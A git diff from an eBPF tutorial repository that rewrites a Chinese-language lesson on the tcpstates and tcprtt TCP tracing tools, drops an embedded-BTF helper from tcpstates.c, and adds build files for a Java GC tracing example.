diff --git a/13-tcpconnlat/tcpconnlat.c b/13-tcpconnlat/tcpconnlat.c index 8fa49a5..8c2ca9d 100644 --- a/13-tcpconnlat/tcpconnlat.c +++ b/13-tcpconnlat/tcpconnlat.c @@ -14,7 +14,6 @@ #include #include #include "tcpconnlat.skel.h" -// #include "trace_helpers.h" #define PERF_BUFFER_PAGES 16 #define PERF_POLL_TIMEOUT_MS 100 diff --git a/13-tcpconnlat/tcpconnlat.html b/13-tcpconnlat/tcpconnlat.html index e2962fd..87574ab 100644 --- a/13-tcpconnlat/tcpconnlat.html +++ b/13-tcpconnlat/tcpconnlat.html @@ -83,7 +83,7 @@ diff --git a/14-tcpstates/index.html b/14-tcpstates/index.html index 13d818c..4d0df5a 100644 --- a/14-tcpstates/index.html +++ b/14-tcpstates/index.html @@ -83,7 +83,7 @@ @@ -144,21 +144,27 @@
-

eBPF入门实践教程:使用 libbpf-bootstrap 开发程序统计 TCP 连接延时

-

内核态代码

-
// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause)
-/* Copyright (c) 2021 Hengqi Chen */
-#include <vmlinux.h>
-#include <bpf/bpf_helpers.h>
-#include <bpf/bpf_tracing.h>
-#include <bpf/bpf_core_read.h>
-#include "tcpstates.h"
+                        

eBPF入门实践教程十四:记录 TCP 连接状态与 TCP RTT

+

eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。

+

在我们的 eBPF 入门实践教程系列的这一篇,我们将介绍两个示例程序:tcpstatestcprtttcpstates 用于记录 TCP 连接的状态变化,而 tcprtt 则用于记录 TCP 的往返时间 (RTT, Round-Trip Time)。

+

tcprtttcpstates

+

网络质量在当前的互联网环境中至关重要。影响网络质量的因素有许多,包括硬件、网络环境、软件编程的质量等。为了帮助用户更好地定位网络问题,我们引入了 tcprtt 这个工具。tcprtt 可以监控 TCP 链接的往返时间,从而评估网络质量,帮助用户找出可能的问题所在。

+

当 TCP 链接建立时,tcprtt 会自动根据当前系统的状况,选择合适的执行函数。在执行函数中,tcprtt 会收集 TCP 链接的各项基本信息,如源地址、目标地址、源端口、目标端口、耗时等,并将这些信息更新到直方图型的 BPF map 中。运行结束后,tcprtt 会通过用户态代码,将收集的信息以图形化的方式展示给用户。

+

tcpstates 则是一个专门用来追踪和打印 TCP 连接状态变化的工具。它可以显示 TCP 连接在每个状态中的停留时长,单位为毫秒。例如,对于一个单独的 TCP 会话,tcpstates 可以打印出类似以下的输出:

+
SKADDR           C-PID C-COMM     LADDR           LPORT RADDR           RPORT OLDSTATE    -> NEWSTATE    MS
+ffff9fd7e8192000 22384 curl       100.66.100.185  0     52.33.159.26    80    CLOSE       -> SYN_SENT    0.000
+ffff9fd7e8192000 0     swapper/5  100.66.100.185  63446 52.33.159.26    80    SYN_SENT    -> ESTABLISHED 1.373
+ffff9fd7e8192000 22384 curl       100.66.100.185  63446 52.33.159.26    80    ESTABLISHED -> FIN_WAIT1   176.042
+ffff9fd7e819
 
-#define MAX_ENTRIES 10240
-#define AF_INET     2
-#define AF_INET6    10
-
-const volatile bool filter_by_sport = false;
+2000 0     swapper/5  100.66.100.185  63446 52.33.159.26    80    FIN_WAIT1   -> FIN_WAIT2   0.536
+ffff9fd7e8192000 0     swapper/5  100.66.100.185  63446 52.33.159.26    80    FIN_WAIT2   -> CLOSE       0.006
+
+

以上输出中,最多的时间被花在了 ESTABLISHED 状态,也就是连接已经建立并在传输数据的状态,这个状态到 FIN_WAIT1 状态(开始关闭连接的状态)的转变过程中耗费了 176.042 毫秒。

+

在我们接下来的教程中,我们会更深入地探讨这两个工具,解释它们的实现原理,希望这些内容对你在使用 eBPF 进行网络和性能分析方面的工作有所帮助。

+

tcpstate

+

由于篇幅所限,这里我们主要讨论和分析对应的 eBPF 内核态代码实现。以下是 tcpstate 的 eBPF 代码:

+
const volatile bool filter_by_sport = false;
 const volatile bool filter_by_dport = false;
 const volatile short target_family = 0;
 
@@ -246,78 +252,16 @@ int handle_set_state(struct trace_event_raw_inet_sock_set_state *ctx)
 
     return 0;
 }
-
-char LICENSE[] SEC("license") = "Dual BSD/GPL";
 
-

tcpstates 是一个追踪当前系统上的TCP套接字的TCP状态的程序,主要通过跟踪内核跟踪点 inet_sock_set_state 来实现。统计数据通过 perf_event向用户态传输。

-
SEC("tracepoint/sock/inet_sock_set_state")
-int handle_set_state(struct trace_event_raw_inet_sock_set_state *ctx)
-
-

在套接字改变状态处附加一个eBPF跟踪函数。

-
 if (ctx->protocol != IPPROTO_TCP)
-  return 0;
-
- if (target_family && target_family != family)
-  return 0;
-
- if (filter_by_sport && !bpf_map_lookup_elem(&sports, &sport))
-  return 0;
-
- if (filter_by_dport && !bpf_map_lookup_elem(&dports, &dport))
-  return 0;
-
-

跟踪函数被调用后,先判断当前改变状态的套接字是否满足我们需要的过滤条件,如果不满足则不进行记录。

-
 tsp = bpf_map_lookup_elem(&timestamps, &sk);
- ts = bpf_ktime_get_ns();
- if (!tsp)
-  delta_us = 0;
- else
-  delta_us = (ts - *tsp) / 1000;
-
- event.skaddr = (__u64)sk;
- event.ts_us = ts / 1000;
- event.delta_us = delta_us;
- event.pid = bpf_get_current_pid_tgid() >> 32;
- event.oldstate = ctx->oldstate;
- event.newstate = ctx->newstate;
- event.family = family;
- event.sport = sport;
- event.dport = dport;
- bpf_get_current_comm(&event.task, sizeof(event.task));
-
- if (family == AF_INET) {
-  bpf_probe_read_kernel(&event.saddr, sizeof(event.saddr), &sk->__sk_common.skc_rcv_saddr);
-  bpf_probe_read_kernel(&event.daddr, sizeof(event.daddr), &sk->__sk_common.skc_daddr);
- } else { /* family == AF_INET6 */
-  bpf_probe_read_kernel(&event.saddr, sizeof(event.saddr), &sk->__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
-  bpf_probe_read_kernel(&event.daddr, sizeof(event.daddr), &sk->__sk_common.skc_v6_daddr.in6_u.u6_addr32);
- }
-
-

使用状态改变相关填充event结构体。

-
    -
  • 此处使用了libbpf 的 CO-RE 支持。
  • -
-
 bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &event, sizeof(event));
-
-

将事件结构体发送至用户态程序。

-
 if (ctx->newstate == TCP_CLOSE)
-  bpf_map_delete_elem(&timestamps, &sk);
- else
-  bpf_map_update_elem(&timestamps, &sk, &ts, BPF_ANY);
-
-

根据这个TCP链接的新状态,决定是更新下时间戳记录还是不再记录它的时间戳。

-

用户态程序

-
    while (!exiting) {
-        err = perf_buffer__poll(pb, PERF_POLL_TIMEOUT_MS);
-        if (err < 0 && err != -EINTR) {
-            warn("error polling perf buffer: %s\n", strerror(-err));
-            goto cleanup;
-        }
-        /* reset err to return 0 if exiting */
-        err = 0;
-    }
-
-

不停轮询内核程序所发过来的 perf event

+

tcpstates主要依赖于 eBPF 的 Tracepoints 来捕获 TCP 连接的状态变化,从而跟踪 TCP 连接在每个状态下的停留时间。

+

定义 BPF Maps

+

tcpstates程序中,首先定义了几个 BPF Maps,它们是 eBPF 程序和用户态程序之间交互的主要方式。sportsdports分别用于存储源端口和目标端口,用于过滤 TCP 连接;timestamps用于存储每个 TCP 连接的时间戳,以计算每个状态的停留时间;events则是一个 perf_event 类型的 map,用于将事件数据发送到用户态。

+

追踪 TCP 连接状态变化

+

程序定义了一个名为handle_set_state的函数,该函数是一个 tracepoint 类型的程序,它将被挂载到sock/inet_sock_set_state这个内核 tracepoint 上。每当 TCP 连接状态发生变化时,这个 tracepoint 就会被触发,然后执行handle_set_state函数。

+

handle_set_state函数中,首先通过一系列条件判断确定是否需要处理当前的 TCP 连接,然后从timestampsmap 中获取当前连接的上一个时间戳,然后计算出停留在当前状态的时间。接着,程序将收集到的数据放入一个 event 结构体中,并通过bpf_perf_event_output函数将该 event 发送到用户态。

+

更新时间戳

+

最后,根据 TCP 连接的新状态,程序将进行不同的操作:如果新状态为 TCP_CLOSE,表示连接已关闭,程序将从timestampsmap 中删除该连接的时间戳;否则,程序将更新该连接的时间戳。

+

用户态的部分主要是通过 libbpf 来加载 eBPF 程序,然后通过 perf_event 来接收内核中的事件数据:

static void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) {
     char ts[32], saddr[26], daddr[26];
     struct event* e = data;
@@ -350,13 +294,100 @@ int handle_set_state(struct trace_event_raw_inet_sock_set_state *ctx)
             (double)e->delta_us / 1000);
     }
 }
+
+

handle_event就是这样一个回调函数,它会被 perf_event 调用,每当内核有新的事件到达时,它就会处理这些事件。

+

handle_event函数中,我们首先通过inet_ntop函数将二进制的 IP 地址转换成人类可读的格式,然后根据是否需要输出宽格式,分别打印不同的信息。这些信息包括了事件的时间戳、源 IP 地址、源端口、目标 IP 地址、目标端口、旧状态、新状态以及在旧状态停留的时间。

+

这样,用户就可以清晰地看到 TCP 连接状态的变化,以及每个状态的停留时间,从而帮助他们诊断网络问题。

+

总结起来,用户态部分的处理主要涉及到了以下几个步骤:

+
    +
  1. 使用 libbpf 加载并运行 eBPF 程序。
  2. +
  3. 设置回调函数来接收内核发送的事件。
  4. +
  5. 处理接收到的事件,将其转换成人类可读的格式并打印。
  6. +
+

以上就是tcpstates程序用户态部分的主要实现逻辑。通过这一章的学习,你应该已经对如何在用户态处理内核事件有了更深入的理解。在下一章中,我们将介绍更多关于如何使用 eBPF 进行网络监控的知识。

+

tcprtt

+

在本章节中,我们将分析tcprtt eBPF 程序的内核态代码。tcprtt是一个用于测量 TCP 往返时间(Round Trip Time, RTT)的程序,它将 RTT 的信息统计到一个 histogram 中。

+

+/// @sample {"interval": 1000, "type" : "log2_hist"}
+struct {
+    __uint(type, BPF_MAP_TYPE_HASH);
+    __uint(max_entries, MAX_ENTRIES);
+    __type(key, u64);
+    __type(value, struct hist);
+} hists SEC(".maps");
 
-static void handle_lost_events(void* ctx, int cpu, __u64 lost_cnt) {
-    warn("lost %llu events on CPU #%d\n", lost_cnt, cpu);
+static struct hist zero;
+
+SEC("fentry/tcp_rcv_established")
+int BPF_PROG(tcp_rcv, struct sock *sk)
+{
+    const struct inet_sock *inet = (struct inet_sock *)(sk);
+    struct tcp_sock *ts;
+    struct hist *histp;
+    u64 key, slot;
+    u32 srtt;
+
+    if (targ_sport && targ_sport != inet->inet_sport)
+        return 0;
+    if (targ_dport && targ_dport != sk->__sk_common.skc_dport)
+        return 0;
+    if (targ_saddr && targ_saddr != inet->inet_saddr)
+        return 0;
+    if (targ_daddr && targ_daddr != sk->__sk_common.skc_daddr)
+        return 0;
+
+    if (targ_laddr_hist)
+        key = inet->inet_saddr;
+    else if (targ_raddr_hist)
+        key = inet->sk.__sk_common.skc_daddr;
+    else
+        key = 0;
+    histp = bpf_map_lookup_or_try_init(&hists, &key, &zero);
+    if (!histp)
+        return 0;
+    ts = (struct tcp_sock *)(sk);
+    srtt = BPF_CORE_READ(ts, srtt_us) >> 3;
+    if (targ_ms)
+        srtt /= 1000U;
+    slot = log2l(srtt);
+    if (slot >= MAX_SLOTS)
+        slot = MAX_SLOTS - 1;
+    __sync_fetch_and_add(&histp->slots[slot], 1);
+    if (targ_show_ext) {
+        __sync_fetch_and_add(&histp->latency, srtt);
+        __sync_fetch_and_add(&histp->cnt, 1);
+    }
+    return 0;
 }
 
-

收到事件后所调用对应的处理函数并进行输出打印。

+

首先,我们定义了一个 hash 类型的 eBPF map,名为hists,它用来存储 RTT 的统计信息。在这个 map 中,键是 64 位整数,值是一个hist结构,这个结构包含了一个数组,用来存储不同 RTT 区间的数量。

+

接着,我们定义了一个 eBPF 程序,名为tcp_rcv,这个程序会在每次内核中处理 TCP 收包的时候被调用。在这个程序中,我们首先根据过滤条件(源/目标 IP 地址和端口)对 TCP 连接进行过滤。如果满足条件,我们会根据设置的参数选择相应的 key(源 IP 或者目标 IP 或者 0),然后在hists map 中查找或者初始化对应的 histogram。

+

接下来,我们读取 TCP 连接的srtt_us字段,这个字段表示了平滑的 RTT 值,单位是微秒。然后我们将这个 RTT 值转换为对数形式,并将其作为 slot 存储到 histogram 中。

+

如果设置了show_ext参数,我们还会将 RTT 值和计数器累加到 histogram 的latencycnt字段中。

+

通过以上的处理,我们可以对每个 TCP 连接的 RTT 进行统计和分析,从而更好地理解网络的性能状况。

+

总结起来,tcprtt eBPF 程序的主要逻辑包括以下几个步骤:

+
    +
  1. 根据过滤条件对 TCP 连接进行过滤。
  2. +
  3. hists map 中查找或者初始化对应的 histogram。
  4. +
  5. 读取 TCP 连接的srtt_us字段,并将其转换为对数形式,存储到 histogram 中。
  6. +
  7. 如果设置了show_ext参数,将 RTT 值和计数器累加到 histogram 的latencycnt字段中。
  8. +
+

tcprtt 挂载到了内核态的 tcp_rcv_established 函数上:

+
void tcp_rcv_established(struct sock *sk, struct sk_buff *skb);
+
+

这个函数是在内核中处理TCP接收数据的主要函数,主要在TCP连接处于ESTABLISHED状态时被调用。这个函数的处理逻辑包括一个快速路径和一个慢速路径。快速路径在以下几种情况下会被禁用:

+
    +
  • 我们宣布了一个零窗口 - 零窗口探测只能在慢速路径中正确处理。
  • +
  • 收到了乱序的数据包。
  • +
  • 期待接收紧急数据。
  • +
  • 没有剩余的缓冲区空间。
  • +
  • 接收到了意外的TCP标志/窗口值/头部长度(通过检查TCP头部与预设标志进行检测)。
  • +
  • 数据在两个方向上都在传输。快速路径只支持纯发送者或纯接收者(这意味着序列号或确认值必须保持不变)。
  • +
  • 接收到了意外的TCP选项。
  • +
+

当这些条件不满足时,它会进入一个标准的接收处理过程,这个过程遵循RFC793来处理所有情况。前三种情况可以通过正确的预设标志设置来保证,剩下的情况则需要内联检查。当一切都正常时,快速处理过程会在tcp_data_queue函数中被开启。

编译运行

+

对于 tcpstates,可以通过以下命令编译和运行 libbpf 应用:

$ make
 ...
   BPF      .output/tcpstates.bpf.o
@@ -375,8 +406,92 @@ ffff9bf6d8ee88c0 229832  redis-serv 0.0.0.0         6379  0.0.0.0         0
 ffff9bf6d8ee88c0 229832  redis-serv 0.0.0.0         6379  0.0.0.0         0     LISTEN      -> CLOSE       1.763
 ffff9bf7109d6900 88750   node       127.0.0.1       39755 127.0.0.1       50966 ESTABLISHED -> FIN_WAIT1   0.000
 
+

对于 tcprtt,我们可以使用 eunomia-bpf 编译运行这个例子:

+

Compile:

+
docker run -it -v `pwd`/:/src/ yunwei37/ebpm:latest
+
+

或者

+
$ ecc runqlat.bpf.c runqlat.h
+Compiling bpf object...
+Generating export types...
+Packing ebpf object and config into package.json...
+
+

运行:

+
$ sudo ecli run package.json -h
+A simple eBPF program
+
+
+Usage: package.json [OPTIONS]
+
+Options:
+      --verbose                  Whether to show libbpf debug information
+      --targ_laddr_hist          Set value of `bool` variable targ_laddr_hist
+      --targ_raddr_hist          Set value of `bool` variable targ_raddr_hist
+      --targ_show_ext            Set value of `bool` variable targ_show_ext
+      --targ_sport <targ_sport>  Set value of `__u16` variable targ_sport
+      --targ_dport <targ_dport>  Set value of `__u16` variable targ_dport
+      --targ_saddr <targ_saddr>  Set value of `__u32` variable targ_saddr
+      --targ_daddr <targ_daddr>  Set value of `__u32` variable targ_daddr
+      --targ_ms                  Set value of `bool` variable targ_ms
+  -h, --help                     Print help
+  -V, --version                  Print version
+
+Built with eunomia-bpf framework.
+See https://github.com/eunomia-bpf/eunomia-bpf for more information.
+
+$ sudo ecli run package.json
+key =  0
+latency = 0
+cnt = 0
+
+     (unit)              : count    distribution
+         0 -> 1          : 0        |                                        |
+         2 -> 3          : 0        |                                        |
+         4 -> 7          : 0        |                                        |
+         8 -> 15         : 0        |                                        |
+        16 -> 31         : 0        |                                        |
+        32 -> 63         : 0        |                                        |
+        64 -> 127        : 0        |                                        |
+       128 -> 255        : 0        |                                        |
+       256 -> 511        : 0        |                                        |
+       512 -> 1023       : 4        |********************                    |
+      1024 -> 2047       : 1        |*****                                   |
+      2048 -> 4095       : 0        |                                        |
+      4096 -> 8191       : 8        |****************************************|
+
+key =  0
+latency = 0
+cnt = 0
+
+     (unit)              : count    distribution
+         0 -> 1          : 0        |                                        |
+         2 -> 3          : 0        |                                        |
+         4 -> 7          : 0        |                                        |
+         8 -> 15         : 0        |                                        |
+        16 -> 31         : 0        |                                        |
+        32 -> 63         : 0        |                                        |
+        64 -> 127        : 0        |                                        |
+       128 -> 255        : 0        |                                        |
+       256 -> 511        : 0        |                                        |
+       512 -> 1023       : 11       |***************************             |
+      1024 -> 2047       : 1        |**                                      |
+      2048 -> 4095       : 0        |                                        |
+      4096 -> 8191       : 16       |****************************************|
+      8192 -> 16383      : 4        |**********                              |
+
+

完整源代码:

+ +

参考资料:

+

总结

-

这里的代码修改自 https://github.com/iovisor/bcc/blob/master/libbpf-tools/tcpstates.bpf.c

+

通过本篇 eBPF 入门实践教程,我们学习了如何使用tcpstates和tcprtt这两个 eBPF 示例程序,监控和分析 TCP 的连接状态和往返时间。我们了解了tcpstates和tcprtt的工作原理和实现方式,包括如何使用 BPF map 存储数据,如何在 eBPF 程序中获取和处理 TCP 连接信息,以及如何在用户态应用程序中解析和显示 eBPF 程序收集的数据。

+

如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容。

diff --git a/14-tcpstates/tcpstates.c b/14-tcpstates/tcpstates.c index ecdeb67..6f9d8c5 100644 --- a/14-tcpstates/tcpstates.c +++ b/14-tcpstates/tcpstates.c @@ -183,257 +183,6 @@ static void handle_lost_events(void* ctx, int cpu, __u64 lost_cnt) { warn("lost %llu events on CPU #%d\n", lost_cnt, cpu); } -extern unsigned char _binary_min_core_btfs_tar_gz_start[] __attribute__((weak)); -extern unsigned char _binary_min_core_btfs_tar_gz_end[] __attribute__((weak)); - - -/* tar header from - * https://github.com/tklauser/libtar/blob/v1.2.20/lib/libtar.h#L39-L60 */ -struct tar_header { - char name[100]; - char mode[8]; - char uid[8]; - char gid[8]; - char size[12]; - char mtime[12]; - char chksum[8]; - char typeflag; - char linkname[100]; - char magic[6]; - char version[2]; - char uname[32]; - char gname[32]; - char devmajor[8]; - char devminor[8]; - char prefix[155]; - char padding[12]; -}; - -static char* tar_file_start(struct tar_header* tar, - const char* name, - int* length) { - while (tar->name[0]) { - sscanf(tar->size, "%o", length); - if (!strcmp(tar->name, name)) - return (char*)(tar + 1); - tar += 1 + (*length + 511) / 512; - } - return NULL; -} -#define FIELD_LEN 65 -#define ID_FMT "ID=%64s" -#define VERSION_FMT "VERSION_ID=\"%64s" - -struct os_info { - char id[FIELD_LEN]; - char version[FIELD_LEN]; - char arch[FIELD_LEN]; - char kernel_release[FIELD_LEN]; -}; - -static struct os_info* get_os_info() { - struct os_info* info = NULL; - struct utsname u; - size_t len = 0; - ssize_t read; - char* line = NULL; - FILE* f; - - if (uname(&u) == -1) - return NULL; - - f = fopen("/etc/os-release", "r"); - if (!f) - return NULL; - - info = calloc(1, sizeof(*info)); - if (!info) - goto out; - - strncpy(info->kernel_release, u.release, FIELD_LEN); - strncpy(info->arch, u.machine, FIELD_LEN); - - while ((read = getline(&line, &len, f)) != -1) { - if (sscanf(line, ID_FMT, info->id) == 1) - continue; - - if (sscanf(line, VERSION_FMT, info->version) == 1) { - /* remove '"' suffix */ - info->version[strlen(info->version) - 1] = 0; - continue; - } - } - -out: - free(line); - fclose(f); - - return info; -} -#define INITIAL_BUF_SIZE (1024 * 1024 * 4) /* 4MB */ - -/* adapted from https://zlib.net/zlib_how.html */ -static int inflate_gz(unsigned char* src, - int src_size, - unsigned char** dst, - int* dst_size) { - size_t size = INITIAL_BUF_SIZE; - size_t next_size = size; - z_stream strm; - void* tmp; - int ret; - - strm.zalloc = Z_NULL; - strm.zfree = Z_NULL; - strm.opaque = Z_NULL; - strm.avail_in = 0; - strm.next_in = Z_NULL; - - ret = inflateInit2(&strm, 16 + MAX_WBITS); - if (ret != Z_OK) - return -EINVAL; - - *dst = malloc(size); - if (!*dst) - return -ENOMEM; - - strm.next_in = src; - strm.avail_in = src_size; - - /* run inflate() on input until it returns Z_STREAM_END */ - do { - strm.next_out = *dst + strm.total_out; - strm.avail_out = next_size; - ret = inflate(&strm, Z_NO_FLUSH); - if (ret != Z_OK && ret != Z_STREAM_END) - goto out_err; - /* we need more space */ - if (strm.avail_out == 0) { - next_size = size; - size *= 2; - tmp = realloc(*dst, size); - if (!tmp) { - ret = -ENOMEM; - goto out_err; - } - *dst = tmp; - } - } while (ret != Z_STREAM_END); - - *dst_size = strm.total_out; - - /* clean up and return */ - ret = inflateEnd(&strm); - if (ret != Z_OK) { - ret = -EINVAL; - goto out_err; - } - return 0; - -out_err: - free(*dst); - *dst = NULL; - return ret; -} -struct btf *btf__load_vmlinux_btf(void); -void btf__free(struct btf *btf); -static bool vmlinux_btf_exists(void) { - struct btf* btf; - int err; - - btf = btf__load_vmlinux_btf(); - err = libbpf_get_error(btf); - if (err) - return false; - - btf__free(btf); - return true; -} - -static int ensure_core_btf(struct bpf_object_open_opts* opts) { - char name_fmt[] = "./%s/%s/%s/%s.btf"; - char btf_path[] = "/tmp/bcc-libbpf-tools.btf.XXXXXX"; - struct os_info* info = NULL; - unsigned char* dst_buf = NULL; - char* file_start; - int dst_size = 0; - char name[100]; - FILE* dst = NULL; - int ret; - - /* do nothing if the system provides BTF */ - if (vmlinux_btf_exists()) - return 0; - - /* compiled without min core btfs */ - if (!_binary_min_core_btfs_tar_gz_start) - return -EOPNOTSUPP; - - info = get_os_info(); - if (!info) - return -errno; - - ret = mkstemp(btf_path); - if (ret < 0) { - ret = -errno; - goto out; - } - - dst = fdopen(ret, "wb"); - if (!dst) { - ret = -errno; - goto out; - } - - ret = snprintf(name, sizeof(name), name_fmt, info->id, info->version, - info->arch, info->kernel_release); - if (ret < 0 || ret == sizeof(name)) { - ret = -EINVAL; - goto out; - } - - ret = inflate_gz( - _binary_min_core_btfs_tar_gz_start, - _binary_min_core_btfs_tar_gz_end - _binary_min_core_btfs_tar_gz_start, - &dst_buf, &dst_size); - if (ret < 0) - goto out; - - ret = 0; - file_start = tar_file_start((struct tar_header*)dst_buf, name, &dst_size); - if (!file_start) { - ret = -EINVAL; - goto out; - } - - if (fwrite(file_start, 1, dst_size, dst) != dst_size) { - ret = -ferror(dst); - goto out; - } - - opts->btf_custom_path = strdup(btf_path); - if (!opts->btf_custom_path) - ret = -ENOMEM; - -out: - free(info); - fclose(dst); - free(dst_buf); - - return ret; -} - -static void cleanup_core_btf(struct bpf_object_open_opts* opts) { - if (!opts) - return; - - if (!opts->btf_custom_path) - return; - - unlink(opts->btf_custom_path); - free((void*)opts->btf_custom_path); -} - int main(int argc, char** argv) { LIBBPF_OPTS(bpf_object_open_opts, open_opts); static const struct argp argp = { @@ -454,12 +203,6 @@ int main(int argc, char** argv) { libbpf_set_strict_mode(LIBBPF_STRICT_ALL); libbpf_set_print(libbpf_print_fn); - err = ensure_core_btf(&open_opts); - if (err) { - warn("failed to fetch necessary BTF for CO-RE: %s\n", strerror(-err)); - return 1; - } - obj = tcpstates_bpf__open_opts(&open_opts); if (!obj) { warn("failed to open BPF object\n"); @@ -540,7 +283,6 @@ int main(int argc, char** argv) { cleanup: perf_buffer__free(pb); tcpstates_bpf__destroy(obj); - cleanup_core_btf(&open_opts); return err != 0; } diff --git a/15-javagc/.gitignore b/15-javagc/.gitignore new file mode 100644 index 0000000..f3a652f --- /dev/null +++ b/15-javagc/.gitignore @@ -0,0 +1,9 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml +package.yaml +ecli +javagc +*.class diff --git a/15-javagc/Makefile b/15-javagc/Makefile new file mode 100644 index 0000000..1407744 --- /dev/null +++ b/15-javagc/Makefile @@ -0,0 +1,141 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS) + +APPS = javagc # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get Clang's default includes on this system. We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. +CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + $(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git 